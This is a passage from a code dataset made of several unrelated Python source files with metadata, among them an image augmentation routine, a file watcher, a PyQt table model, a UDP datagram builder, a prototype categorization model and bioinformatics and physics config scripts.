bboxes.shape[1] == 5, \\\n 'bboxes should have 5 columns'\n\n corners = pointxita2corners(bboxes)\n corners[:, 0::2] = np.round(corners[:, 0::2] * image.shape[1])\n corners[:, 1::2] = np.round(corners[:, 1::2] * image.shape[0])\n\n # print(corners)\n # time.sleep(50)\n\n im = image.copy()\n\n for i in range(corners.shape[0]):\n c = corners[i, :].astype(int)\n # print(c.dtype)\n for j in [0, 2, 4, 6]:\n cv2.line(im, (c[j % 8], c[(j + 1) % 8]), (c[(j + 2) % 8], c[(j + 3) % 8]), (0, 255, 0), 2)\n cv2.imshow('bboxes', im)\n cv2.waitKey()\n\n\ndef preprocess(images, bboxes, options):\n \"\"\"\n preprocess the input images and labels given options\n :param images: numpy array\n :param bboxes:\n :param options:\n :return:\n \"\"\"\n assert images.shape[2] == 3, \\\n 'input images should have 3 channels'\n assert bboxes.shape[1] == 5, \\\n 'input rotated bounding box annotation should have 5 dims'\n for key in options.keys():\n assert key in ['flip', 'crop', 'distortion'], \\\n 'the input key {:s} is not in the pre-defined list'.format(key)\n\n if options['flip'] == 1:\n images, bboxes = random_horizontal_flip(images, bboxes)\n if options['crop'] == 1:\n images, bboxes = random_crop(images, bboxes, 0.2)\n if options['distortion'] == 1:\n images, bboxes = random_distort_color(images, bboxes)\n\n draw_bboxes(images, bboxes)\n\n\nif __name__ == '__main__':\n image_path = 'test.jpg'\n anno_path = 'test.txt'\n\n image = cv2.imread(image_path)\n with open(anno_path, 'r') as f:\n raw_lines = f.readlines()\n bboxes = [line.strip().split(' ') for line in raw_lines]\n bboxes = np.vstack(bboxes)\n bboxes = bboxes[:, 1:].astype(np.float32)\n\n for i in range(10):\n 
preprocess(image, bboxes, {'flip': 1, 'crop': 1, 'distortion': 1})\n\n\n\n","sub_path":"lib/data_layer/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":7605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"476428983","text":"import errno, fnmatch, logging, os, stat, threading, time\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nclass WatcherThread(threading.Thread):\n\n\tstop = False\n\n\tdef __init__(self, folder, callback, sync_interval, files_to_include = [], files_to_ignore = [], dirs_to_ignore = []):\n\t\tself.folder = folder;\n\t\tself.callback = callback\n\n\t\tself.sync_interval = sync_interval\n\t\t\n\t\tself.files_to_include = files_to_include\n\t\tself.files_to_ignore = files_to_ignore\n\t\tself.dirs_to_ignore = dirs_to_ignore\n\n\t\tthreading.Thread.__init__(self)\n\n\tdef run(self):\n\t\tw = Watcher(self.folder, self.callback, self.files_to_include, self.files_to_ignore, self.dirs_to_ignore)\n\t\twhile not self.stop:\n\t\t\tw.loop(self.sync_interval)\n\nclass Watcher(object):\n\n\tinit_done = False\n\n\tdef __init__(self, folder, callback, files_to_include = [], files_to_ignore = [], dirs_to_ignore = []):\n\n\t\tself.folder = folder;\n\t\tself.callback = callback\n\t\t\n\t\tself.files_to_include = files_to_include\n\t\tself.files_to_ignore = files_to_ignore\n\t\tself.dirs_to_ignore = dirs_to_ignore\n\n\t\tself.files_map = {}\n\t\t\n\t\tself.update_files()\n\t\tself.init_done = True\n\n\tdef __del__(self):\t\t\n\t\tfor key, value in self.files_map.items():\n\t\t\tlogger.debug(\"unwatching %s\" % value[\"path\"])\n\n\tdef listdir(self, walk = False):\n\t\titems = []\n\t\tfor root, dir_names, file_names in os.walk(self.folder):\n\t\t\t[dir_names.remove(d) for d in dir_names if d in self.dirs_to_ignore]\n\n\t\t\tfor file_name in file_names:\n\t\t\t\tfull_path = os.path.join(root, file_name)\n\t\t\t\trel_path = os.path.relpath(full_path, self.folder)\n\n\t\t\t\tinclude_matches = [fnmatch.fnmatch(rel_path, p) for p in self.files_to_include]\n\t\t\t\tignore_matches = [fnmatch.fnmatch(rel_path, p) for p in self.files_to_ignore]\n\n\t\t\t\tif any(ignore_matches) or not any(include_matches):\n\t\t\t\t\tcontinue\n\n\t\t\t\titems += [{\"key\": rel_path, \"path\": full_path, \"dir\": os.path.dirname(rel_path), \"version\": os.path.getmtime(full_path)}]\n\t\t\n\t\treturn items\n\n\tdef loop(self, interval = 1.5):\n\t\tself.update_files()\n\t\tfor key, value in self.files_map.items():\n\t\t\tself.check_file(key, value)\n\t\ttime.sleep(interval)\n\n\tdef check_file(self, key, value):\n\t\tfile_mtime = os.path.getmtime(value[\"path\"])\n\t\tif file_mtime != value[\"version\"]:\n\t\t\tself.files_map[key][\"version\"] = file_mtime\n\n\t\t\t# Run callback if file name changes\n\t\t\tself.callback(dict({\"type\": \"m\"}, **value))\n\n\tdef update_files(self):\n\t\titems = []\n\n\t\tfor item in self.listdir():\n\t\t\tif item[\"key\"] not in self.files_map:\n\t\t\t\titems += [item]\n\t\t\n\t\t# check existent files\n\t\tfor key, value in self.files_map.copy().items():\n\t\t\tif not os.path.exists(value[\"path\"]):\n\t\t\t\tself.unwatch(value)\n\n\t\tfor item in items:\n\t\t\tif item[\"key\"] not in self.files_map:\n\t\t\t\tself.watch(item)\n\n\tdef watch(self, item):\n\t\tlogger.debug(\"watching %s\" % item[\"path\"])\n\t\tself.files_map[item[\"key\"]] = item\n\n\t\t# Run callback if file name changes\n\t\tif self.init_done:\n\t\t\tself.callback(dict({\"type\": \"c\"}, 
**item))\n\n\tdef unwatch(self, item):\n\t\tlogger.debug(\"unwatching %s\" % item[\"path\"])\n\t\tdel self.files_map[item[\"key\"]]\n\t\t\n\t\t# Run callback if file name changes\n\t\tself.callback(dict({\"type\": \"d\"}, **item))","sub_path":"Backup/20131003100440/Package Syncing/package_syncing/watcher.py","file_name":"watcher.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"370001607","text":"from PyQt5 import QtCore\nfrom PyQt5.QtCore import *\n\n\nclass TableModel(QAbstractTableModel):\n def __init__(self, parent=None):\n super(TableModel, self).__init__()\n self.datatable = None\n\n def update(self, data):\n print('Updating model')\n self.datatable = data\n print(f'Data: {self.datatable}')\n\n def rowCount(self, parent=QModelIndex()):\n if self.datatable:\n return len(self.datatable)\n return 0\n\n def columnCount(self, parent=QModelIndex):\n if self.datatable:\n return len(self.datatable[0])\n return 0\n\n def flags(self, index):\n flags = super(TableModel, self).flags(index)\n j = index.column()\n if j == 1:\n flags |= Qt.ItemIsEditable\n elif j == 3 or j == 4:\n flags |= Qt.ItemIsUserCheckable\n return flags\n\n def setData(self, index: QModelIndex, value, role=Qt.DisplayRole):\n i = index.row()\n j = index.column()\n if role == Qt.EditRole and j == 1:\n self.datatable[i][j] = value\n elif role == Qt.CheckStateRole and (j==3 or j==4):\n if value:\n self.datatable[i][j] = True\n else:\n self.datatable[i][j] = False\n return True\n\n def data(self, index, role=Qt.DisplayRole):\n i = index.row()\n j = index.column()\n if role == Qt.DisplayRole:\n return f'{self.datatable[i][j]}'\n elif role == Qt.CheckStateRole and (j == 3 or j == 4):\n if self.datatable[i][j]:\n return Qt.Checked\n else:\n return Qt.Unchecked\n elif role == Qt.EditRole and j == 1:\n return self.datatable[i][j]\n else:\n return QVariant()\n\n def headerData(self, section, orientation=Qt.Horizontal, role=Qt.DisplayRole):\n if role == QtCore.Qt.DisplayRole:\n if orientation == QtCore.Qt.Horizontal:\n return [\"Id\", \"Task\", \"Date\", \"Done\", \"Delete\"][section]\n if orientation == QtCore.Qt.Vertical:\n return section+1\n","sub_path":"model/TableModel.py","file_name":"TableModel.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"108177331","text":"from db.conn import DB\nimport itertools\n\nclass combination_lexicon(object):\n\n combinationLexicon = dict()\n\n def __init__(self, products):\n self.products = products\n self.db = DB()\n self.createCombinationLexicon()\n\n \n def createCombinationLexicon(self):\n two_combinations = self.createKCombinations(2)\n three_combinations = self.createKCombinations(3)\n self.countFrequenciesAndCreateSignatures(two_combinations)\n self.countFrequenciesAndCreateSignatures(three_combinations)\n self.countDistance(2)\n self.countDistance(3)\n\n def countFrequenciesAndCreateSignatures(self, combinations):\n for titleCombinations in combinations:\n if(len(titleCombinations) > 0):\n\n for combination in titleCombinations:\n signature = self.computeSignatureOfKCombination(combination)\n\n if signature in self.combinationLexicon:\n self.combinationLexicon[signature]['count'] = self.combinationLexicon[signature]['count'] + 1\n else:\n self.combinationLexicon[signature] = dict()\n self.combinationLexicon[signature]['combination'] = str(combination)\n self.combinationLexicon[signature]['count'] 
= 1\n self.combinationLexicon[signature]['distance'] = 0\n\n def computeSignatureOfKCombination(self, k_combination_list_of_words):\n signatureList = list()\n for word in k_combination_list_of_words:\n id = self.db.getIdOfTokenByToken(word.lower())\n signatureList.append(int(id))\n\n signatureList.sort()\n signature = '-'.join(map(str,signatureList))\n \n return signature\n\n def createKCombination(self, product, k_combination_number_of_words):\n listToReturn = list()\n for c in itertools.combinations(product, k_combination_number_of_words):\n listToReturn.append(c)\n\n return listToReturn\n\n\n def createKCombinations(self, k_combination_number_of_words):\n k_combinations = list()\n for product in self.products:\n k_combinations.append(self.createKCombination(product.split(), k_combination_number_of_words))\n \n return k_combinations\n\n def countDistance(self, k_combination_number_of_words):\n \n for product in self.products:\n productSplit = product.split()\n k_combinations = self.createKCombination(productSplit, k_combination_number_of_words)\n \n for combination in k_combinations:\n signature = self.computeSignatureOfKCombination(combination)\n s = 0\n for word in combination:\n add = self.euclidean(combination.index(word), productSplit.index(word))\n s = s + add\n \n self.combinationLexicon[signature]['distance'] = self.combinationLexicon[signature]['distance'] + s\n\n def euclidean(self, num1, num2):\n return (num1 - num2)**2\n \n","sub_path":"combination_lexicon.py","file_name":"combination_lexicon.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"175794724","text":"from helper import parseAddress, parsePort, getByteArray, ipSplitAdd, adder, ipConvert\r\nimport sys\r\nimport L1\r\n\r\n\r\n# Test length of command line args for sender\r\ndef testArgs():\r\n if len(sys.argv) != 7:\r\n print(\"Must use 6 command line arguments for sender, Exiting!\")\r\n sys.exit()\r\n\r\n\r\n# Main method\r\nif __name__ == '__main__':\r\n\r\n print(\"----------------------------------------------------------\")\r\n testArgs()\r\n datafn, sip, dip, sSPort, sDPort, datagramfn = str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), str(\r\n sys.argv[4]), str(sys.argv[5]), str(sys.argv[6])\r\n\r\n # Parse and test ip addresses\r\n sipList = parseAddress(sip)\r\n dipList = parseAddress(dip)\r\n sip = bytearray(sipList)\r\n dip = bytearray(dipList)\r\n\r\n # Parse and test ports\r\n sPort = parsePort(sSPort)\r\n dPort = parsePort(sDPort)\r\n\r\n # Get data from file and pad if necessary\r\n f0 = L1.testFile(datafn)\r\n data = f0.read()\r\n f0.close()\r\n dataLen = L1.testSize(data)\r\n print(\"Data: \" + str(data)[2:][:len(data)])\r\n pad = 0\r\n if len(data) % 2 != 0:\r\n pad = 1\r\n data = L1.pad(data)\r\n\r\n # Get key from file\r\n f1 = L1.testFile(\"key.txt\")\r\n key = f1.read()\r\n f1.close()\r\n L1.testKey(key)\r\n key = key.decode(\"utf-8\")\r\n print(\"Key: \" + key + \"\\n\")\r\n\r\n # Print info to user\r\n print(\"Data Filename: \" + datafn)\r\n print(\"Source IP: \" + str(ipConvert(sip)[0]) + \" (LE10)\")\r\n print(\"Destination IP: \" + str(ipConvert(dip)[0]) + \" (LE10)\")\r\n print(\"Source Port: \" + sSPort)\r\n print(\"Destination Port: \" + sDPort)\r\n print(\"Datagram Filename: \" + datagramfn + \"\\n\")\r\n\r\n # Encrypt and convert to bytes\r\n chunks = L1.encrypt(data, key)\r\n bData = []\r\n for a in range(0, len(chunks)):\r\n for b in range(0, len(chunks[a])):\r\n 
bData.append(ord(chunks[a][b]))\r\n bData = bytearray(bData)\r\n\r\n # Write encrypted data\r\n L1.writeData(\"sOut\", chunks, pad)\r\n\r\n # Get everything we nee to generate checksum\r\n siph, diph = ipSplitAdd(sip), ipSplitAdd(dip)\r\n zero, protocol = bytes([0]), bytes([17])\r\n totalLen = dataLen + 8 # Total length is the length in bytes of the datagram:the udp header and data before padding\r\n tl = getByteArray(totalLen)\r\n sp = getByteArray(int(sPort))\r\n dp = getByteArray(int(dPort))\r\n\r\n print(\"Filesize: \" + str(dataLen) + \" Bytes\")\r\n print(\"Total Length: \" + str(totalLen) + \" Bytes\")\r\n\r\n # Add everything up\r\n cs = adder(siph, diph)\r\n cs = adder(cs, zero)\r\n cs = adder(cs, protocol)\r\n cs = adder(cs, tl)\r\n cs = adder(cs, sp)\r\n cs = adder(cs, dp)\r\n cs = adder(cs, tl)\r\n\r\n # Add data\r\n for a in range(0, len(chunks)):\r\n x = chunks[a]\r\n y = bin(ord(x[0]))[2:].zfill(8) + bin(ord(x[1]))[2:].zfill(8)\r\n y = int(y, 2)\r\n cs = adder(cs, y)\r\n\r\n # take ones compliment\r\n cs = bytes.fromhex(hex(cs)[2:].zfill(4))\r\n x = int(cs.hex(), 16) ^ int(0xFFFF)\r\n cs = getByteArray(x)\r\n print(\"Checksum is: 0x\" + cs.hex())\r\n\r\n # Generate pseudo header\r\n ph = sip + dip + zero + protocol + tl\r\n if len(ph) != 12:\r\n print(\"Size of pseudo header isn't 12 bytes, Exiting!\")\r\n sys.exit()\r\n\r\n # Generate UDP Datagram\r\n udpdg = sp + dp + tl + cs + bData\r\n both = ph + udpdg\r\n\r\n # Write to datagram file\r\n file = open(datagramfn, \"wb\")\r\n file.write(both)\r\n file.close()\r\n print(\"Successfully wrote \" + datafn + \" to \" + datagramfn)\r\n print(\"----------------------------------------------------------\")\r\n","sub_path":"sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"623230301","text":"# There is a special place in hell for me after coding the following lines.\nfrom requests import get\nimport json\n\n\nurl = \"https://raw.githubusercontent.com/pffy/data-mcdonalds-nutritionfacts/master/json/mcd-pretty.json\"\nr = get(url)\n\nitems = json.loads(r.text)\n\nwith open('./Items.hs', \"w\") as f:\n f.write(\"\"\"\n-- AUTOGENERATED see load_items.py\nmodule Items where\n\nimport Item\n\nitems = [\n\"\"\")\n\n output = \",\\n\".join(\n [\" Item %s \\\"%s\\\"\" %\n (item[\"CAL\"], item[\"ITEM\"]) for item in items])\n f.write(output)\n f.write(\"\\n ]\\n\")\n","sub_path":"src/load_items.py","file_name":"load_items.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"611976620","text":"'''\nPrototype Model Based on Medin and Smith's chapter in formal methods of categorization.\n__NOTES__\n* category activations unaffected by memory strength (unlike in gcm)\n'''\n\n# Python Standard Library\nimport sys\nimport itertools\n\n# External Dependencies\nimport numpy as np \n\n\n\n##__Function to Get Pairwise Distances\ndef pairdist2d(inputs, prototypes, r, attn_weights):\n\tpair_dist = np.zeros([inputs.shape[0], prototypes.shape[0]])\n\tfor i in range(inputs.shape[0]):\n\t\tfor e in range(prototypes.shape[0]):\n\t\t\tpair_dist[i,e] = np.power(np.sum(attn_weights * (np.abs(inputs[i,:] - prototypes[e,:])**r)),(1/r))\n\treturn pair_dist\n\n\n##__GCM\ndef prototype(inputs, exemplars, memory_strength, attention_weights, settings):\t\n\t# useful variables\n\tnum_categories = memory_strength.shape[1]\n\tnum_inputs = 
inputs.shape[1]\n\n\t# Create Prototypes\n\tprototypes = []\n\tfor label in np.unique(exemplars[:,-1]):\n\t\tav_feature_values = np.mean(exemplars[exemplars[:,-1]==label][:,:-1], axis=0)\n\t\tprototypes.append(np.concatenate([av_feature_values, [label]]))\n\tprototypes = np.array(prototypes)\n\n\t# Scale Attention Weights\n\tattention_weights = attention_weights / np.sum(attention_weights)\n\n\t# Scale Memory Strengths\n\tz = np.sum(memory_strength, axis=1).reshape([memory_strength.shape[0],1])\n\tz = np.concatenate([z]*num_categories, axis=1)\n\tmemory_strength = np.nan_to_num(memory_strength / z)\n\n\t# Get Pairwise Distances\n\tdistances = pairdist2d(inputs, prototypes[:,:-1], settings['r'], attention_weights)\n\n\t# Calculate Similarity\n\tsimilarity = np.exp(-settings['c'] * distances)\n\n\t# Get Category Activations\n\tcategory_activation = similarity\n\tcategory_activation_rm = category_activation**settings['phi'] \n\tsums = np.array([np.sum(category_activation_rm, axis=1)]).T\n\tprobabilities = category_activation_rm / sums\n\treturn({\n\t\t'probabilities': probabilities,\n\t\t'predictions': np.argmax(probabilities, axis=1)\n\t})\n\n\n\n\n\n\n\n\n\n##__Run Model\nif __name__ == '__main__':\n\tsettings = {\n\t\t'c': 2, \t# specificity parameter\n\t\t'phi': 1, \t# response mapping parameter\n\t\t'r': 1, \t# distance metric\n\t}\n\n\t## Initialize Model Parameters\n\tattention_weights = [.5, .5]\n\n\texemplars = np.array([\n\t\t[.1, .1, 1],\n\t\t[.2, .2, 1],\n\t\t[.3, .3, 1],\n\t\t[.4, .4, 1],\n\t\t[.5, .5, 2],\n\t\t[.6, .6, 2],\n\t\t[.7, .7, 2],\n\t\t[.8, .8, 2],\n\t\t])\n\n\tmemory_strength = np.array([\n\t\t[1, 0],\n\t\t[1, 0],\n\t\t[1, 0],\n\t\t[1, 0],\n\t\t[0, 1],\n\t\t[0, 1],\n\t\t[0, 1],\n\t\t[0, 1],\n\t\t])\n\n\tinputs = np.array([\n\t\t[.1,.1],\n\t\t[.2,.2],\n\t\t[.3,.3],\n\t\t[.4, .4],\n\t\t[.5, .5],\n\t\t[.6, .6],\n\t\t[.7, .7],\n\t\t[.8, .8],\n\t\t])\n\t\n\n\t## Get Model Predictions\n\tpredictions = prototype(inputs, exemplars, memory_strength, attention_weights, settings)\n\tprint(predictions)\n\n\n\n\n\n","sub_path":"models/reference_point_models/prototype.py","file_name":"prototype.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"485431338","text":"\"\"\"Metric.\"\"\"\n\n# pylint: disable=E1101\n\n# Wikiminer\nfrom wikiminer.tasks import Task, MetricAction\nfrom wikiminer.odm.models import Revision\nfrom wikiminer.utils.path import get_module_name\n\n# Globals\nMNAME = get_module_name(__file__)\nMNAME1 = MNAME+'_1'\nMNAME2 = MNAME+'_2'\nNS1 = 0\nNS2 = 1\n\nclass Metric(MetricAction):\n \"\"\"Metric action class.\"\"\"\n\n def execute(self, data=None):\n \"\"\"Action definition.\"\"\"\n cursor = Revision.objects.aggregate(\n { '$match': {\n 'userset': 1,\n 'ns': { '$in': [ NS1, NS2 ] },\n 'rev_size': { '$gt': 200 }\n } },\n { '$project': {\n '_id': 0,\n 'user_name': 1,\n 'n1': { '$cond': [ { '$eq': [ '$ns', NS1 ] }, 1, 0 ] },\n 'n2': { '$cond': [ { '$eq': [ '$ns', NS2 ] }, 1, 0 ] }\n } },\n { '$group': {\n '_id': '$user_name',\n MNAME1: { '$sum': '$n1' },\n MNAME2: { '$sum': '$n2' }\n } },\n { '$project': {\n '_id': 0,\n 'user_name': '$_id',\n MNAME1: 1,\n MNAME2: 1\n } },\n allowDiskUse=True\n )\n return cursor\n\n\ndef execute():\n \"\"\"Execution function.\"\"\"\n return Task(actions=[ Metric() 
])\n","sub_path":"metrics/m38/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"458782925","text":"import numpy as np\nimport random\nimport matplotlib\nimport matplotlib.pyplot as plt\n\ndef main():\n mu = 55\n sigma = 5\n N = 1500000\n\n B = np.random.normal(mu, sigma, N)\n\n xBars = []\n SDs = []\n for n in range(1,201):\n x = B[random.sample(range(N),n)]\n xBars.append(np.mean(x))\n SDs.append(np.std(x, ddof=1))\n\n pos_curve1 = []\n neg_curve1 = []\n pos_curve2 = []\n neg_curve2 = []\n xVals = []\n\n for n in range(1, 201):\n pos_curve1.append(lines(mu, sigma, n, 1.96))\n neg_curve1.append(lines(mu, sigma, n, -1.96))\n pos_curve2.append(lines(mu, sigma, n, 2.58))\n neg_curve2.append(lines(mu, sigma, n, -2.58))\n xVals.append(n)\n\n graph(xBars, pos_curve1, neg_curve1, xVals,'95%' )\n graph(xBars, pos_curve2, neg_curve2, xVals, '99%')\n\n\n\ndef graph(xBars, line1, line2, xVals, percent):\n title = 'Sample means with increasing sample sizes - ' + percent + ' Confidence Interval'\n plt.scatter(xVals, xBars, marker='x')\n plt.title(title)\n plt.xlabel('Sample Size')\n plt.ylabel('x_bar')\n plt.axhline(y=55, color='black',label='mean = 55')\n\n plt.plot(xVals, line1, color='r', linestyle='--')\n plt.plot(xVals, line2, color='r', linestyle='--')\n\n plt.show()\n\n\ndef lines(mu, sigma, n, value):\n return mu + (value * (sigma/(np.sqrt(n))))\n\n\nmain()","sub_path":"Project 5/proj_5_1.py","file_name":"proj_5_1.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"405582531","text":"import struct\n# A place for message keys\n\n\n# The protocl version\nPROTOCOL = 1 \n\n# OPCODE FLAGS\nDATA_PACKET = 1 \nPING = 2 \n\n# Initialized constants\nEMPTY = 0 \nENDIAN = 'little'\n \n# Type codes\nINVALID = '\\0'\nCHAR = 'c' \nBYTE_TYPE = 'y' \nBOOL = 'b' \nINT8 = 'p' \nUINT8 = 'r' \nUINT16 = 'q' \nINT32 = 'i' \nINT = INT32\nUINT32 = 'u' \nINT64 = 'x'\nUINT64 = 't' \nFLOAT = 'f' \nDOUBLE = 'd' \nSTRING = 's' \nOBJECT = 'o' \nARRAY = 'a' \n\n\n# I had a lot of fun with lambdas\n# Each element has an assert and a serialize callback\n# 1st lambda checks that the data is valid, second returns a byte version of that data\nserialize_funcs = {\n INVALID : ((lambda val, byte_length: False), \n (lambda val: False)),\n\n CHAR : ((lambda val, byte_length: byte_length == 1 and type(val) == str and len(val) == 1), \n (lambda val: ord(val))),\n\n BYTE_TYPE : ((lambda val, byte_length: byte_length == 1 and type(val) == bytes and len(val) == 1), \n (lambda val: val)),\n\n BOOL : ((lambda val, byte_length: byte_length == 1 and type(val) == bool), \n (lambda val: 1 if val else 0)),\n\n INT8 : ((lambda val, byte_length: byte_length == 1 and type(val) == int and val < 128 and val > -129),\n (lambda val : val.to_bytes(1, byteorder = ENDIAN, signed = True))),\n\n UINT8 : ((lambda val, byte_length: byte_length == 1 and type(val) == int and val < 256),\n (lambda val : val.to_bytes(1, byteorder = ENDIAN, signed = False))),\n\n UINT16 : ((lambda val, byte_length: byte_length == 2 and type(val) == int and val < 65536),\n (lambda val : val.to_bytes(2, byteorder = ENDIAN, signed = False))),\n\n INT32 : ((lambda val, byte_length: byte_length == 4 and type(val) == int and val < 2147483648 and val > -2147483649),\n (lambda val : val.to_bytes(4, byteorder = ENDIAN, signed = True))),\n\n UINT32 : ((lambda val, 
byte_length: byte_length == 4 and type(val) == int and val < 4294967296),\n (lambda val : val.to_bytes(4, byteorder = ENDIAN, signed = False))),\n\n INT64 : ((lambda val, byte_length: byte_length == 8 and type(val) == int and val < 9223372036854775808 and val > -9223372036854775809), \n (lambda val : val.to_bytes(8, byteorder = ENDIAN, signed = True))),\n\n UINT64 : ((lambda val, byte_length: byte_length == 8 and type(val) == int and val < 18446744073709551616), \n (lambda val : val.to_bytes(8, byteorder = ENDIAN, signed = False))),\n\n FLOAT : ((lambda val, byte_length: byte_length == 4 and type(val) == float), \n (lambda val : struct.pack(\"f\", val))),\n\n DOUBLE : ((lambda val, byte_length: byte_length == 8 and type(val) == float), \n (lambda val : struct.pack(\"d\", val))),\n\n STRING : ((lambda val, byte_length: type(val) == str and len(val) + 1 == byte_length),\n (lambda val : val.encode('utf-8') + b'\\x00')),\n\n OBJECT : ((lambda val, byte_length: False),\n (lambda val : print(\"Idiot, don't serielaize objects\"))),\n\n ARRAY : ((lambda val, byte_length: type(val) == bytearray and len(val) == byte_length),\n (lambda val : val))}\n\n# Stores and reivieves the index and values of a data element setting data size, the fact that it is positive or negative where it is and its value.\nclass DataElement:\n def __init__(self, value, data_size, index, signed):\n self.data_size = data_size\n self.signed = signed\n self.data = value\n self.index = index\n\n def serialize(self) -> bytes:\n return self.data.to_bytes(self.data_size, byteorder = ENDIAN, signed = self.signed)\n\ndefault_header = {\n \"PROTOCOL\" : DataElement(PROTOCOL, 1, 0, False),\n \"OPCODE\" : DataElement(DATA_PACKET, 1, 1, False),\n \"FUNCFLAGS\" : DataElement(EMPTY, 2, 2, False),\n \"CHECKSUM\" : DataElement(EMPTY, 2, 4, False),\n \"BYTE_LENGTH\" : DataElement(13, 4, 6, False),\n \"FIELDS\" : DataElement(EMPTY, 2, 10, False) }\n\ndefault_ping = {\n \"PROTOCOL\" : DataElement(PROTOCOL, 1, 0, False),\n \"OPCODE\" : DataElement(PING, 1, 1, False),\n \"TYPE\" : DataElement(EMPTY, 1, 2, False),\n \"CODE\" : DataElement(EMPTY, 2, 3, False),\n \"CHECKSUM\" : DataElement(EMPTY, 2, 5, False),\n \"EXCESS\" : DataElement(EMPTY, 8, 7, False) }\n\n","sub_path":"sentinet/message/MessageKeys.py","file_name":"MessageKeys.py","file_ext":"py","file_size_in_byte":4485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"620751137","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 13 14:08:54 2019\r\n\r\n@author: mstambou\r\n\r\nscript that will go over two FDR filtered TSVs, the first one being the TSV\r\nfor the HEG, and the second one being the TSV for the top N expanded genomes.\r\n\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport sys\r\nimport os\r\n\r\nif len(sys.argv) != 4:\r\n print('please enter three command line argument to run this script, example to run python3 get_uniquePeptides.py /dir/to/MSGF+/output/ mgf_fname top_n')\r\n\r\nelse:\r\n out_dir = sys.argv[1]\r\n mgf_fname = sys.argv[2]\r\n top_n = sys.argv[3]\r\n\r\nribP_elonF_dir = out_dir+mgf_fname+'_ribP_elonF/'\r\nextended_db_dir = out_dir+mgf_fname+'_extended_db_search/'\r\n\r\nribP_elonF_file = [item for item in os.listdir(ribP_elonF_dir) if item.endswith('.tsv.0.01.tsv')][0]\r\nextended_db_file = [item for item in os.listdir(extended_db_dir) if item.endswith(top_n+'CoveringMostPeptides.tsv.0.01.tsv')][0]\r\n\r\nribP_elonF_df = pd.read_csv(ribP_elonF_dir + ribP_elonF_file, sep = '\\t', header = 
None)\r\nextended_db_df = pd.read_csv(extended_db_dir + extended_db_file, sep = '\\t', header = None)\r\n\r\nribP_elonF_peptides = [''.join(filter(str.isalpha, item)) for item in list(ribP_elonF_df[9])]\r\nextended_db_peptides = [''.join(filter(str.isalpha, item)) for item in list(extended_db_df[9])]\r\n\r\nribP_elonF_peptides = list(set(ribP_elonF_peptides))\r\nextended_db_peptides = list(set(extended_db_peptides))\r\n\r\nall_peptides = list()\r\nall_peptides.extend(ribP_elonF_peptides)\r\nall_peptides.extend(extended_db_peptides)\r\n\r\nall_peptides = list(set(all_peptides))\r\n\r\nwith open(out_dir + 'unique_peptides/'+mgf_fname+'_ribP_elonF_peptides.fasta', 'w') as out_f:\r\n for i, peptide in enumerate(ribP_elonF_peptides):\r\n out_f.write('>peptide'+str(i+1)+'\\n')\r\n out_f.write(peptide+'\\n')\r\n\r\nwith open(out_dir + 'unique_peptides/'+mgf_fname+'top'+str(top_n)+'_extended.fasta', 'w') as out_f:\r\n for i, peptide in enumerate(extended_db_peptides):\r\n out_f.write('>peptide'+str(i+1)+'\\n')\r\n out_f.write(peptide+'\\n')\r\n\r\nwith open(out_dir + 'unique_peptides/'+mgf_fname+'_all_peptides_top'+str(top_n)+'.fasta', 'w') as out_f:\r\n for i, peptide in enumerate(all_peptides):\r\n out_f.write('>peptide'+str(i+1)+'\\n')\r\n out_f.write(peptide+'\\n')\r\n\r\nprint('number of ribP elonF peptides identified: ', len(ribP_elonF_peptides))\r\nprint('number of peptides identified from extended genomes: ', len(extended_db_peptides))\r\nprint('number of peptides identified from combining both: ', len(all_peptides))\r\n","sub_path":"scripts/get_uniquePeptides.py","file_name":"get_uniquePeptides.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"60103265","text":"import os\nclass Conf:\n def __init__(self):\n\n# self.httCandidatecut = [\n# ( 'pt' , '>', '200.0' ),\n# ( 'mass', '>', '120.0' ),\n# ( 'mass', '<', '220.0' ),\n# ( 'fW' , '<', '0.175' )\n# ]\n\n self.httCandidatecut = [\n \n ( 'pt' , '>', '200.0' ),\n ( 'mass', '>', 120.0 ),\n ( 'mass', '<', '220.0' ),\n ( 'fW' , '<', '0.175' )\n \n ]\n\n\n self.leptons = {\n \"mu\": {\n \"tight\": {\n \"pt\": 30,\n \"eta\":2.1,\n \"iso\": 0.12\n },\n \"tight_veto\": {\n \"pt\": 0.0,\n \"eta\": 0.0,\n \"iso\": 0.0,\n },\n \"loose\": {\n \"pt\": 20,\n \"eta\": 2.4,\n \"iso\": 0.2,\n },\n \"loose_veto\": {\n \"pt\": 0.0,\n \"eta\": 0.0,\n \"iso\": 0.0,\n },\n \"isotype\": \"relIso03\",\n \"dxy\": 0.2,\n\n },\n \"el\": {\n \"tight\": {\n \"pt\": 30,\n \"eta\": 2.5,\n \"iso\": 0.1\n },\n \"tight_veto\": 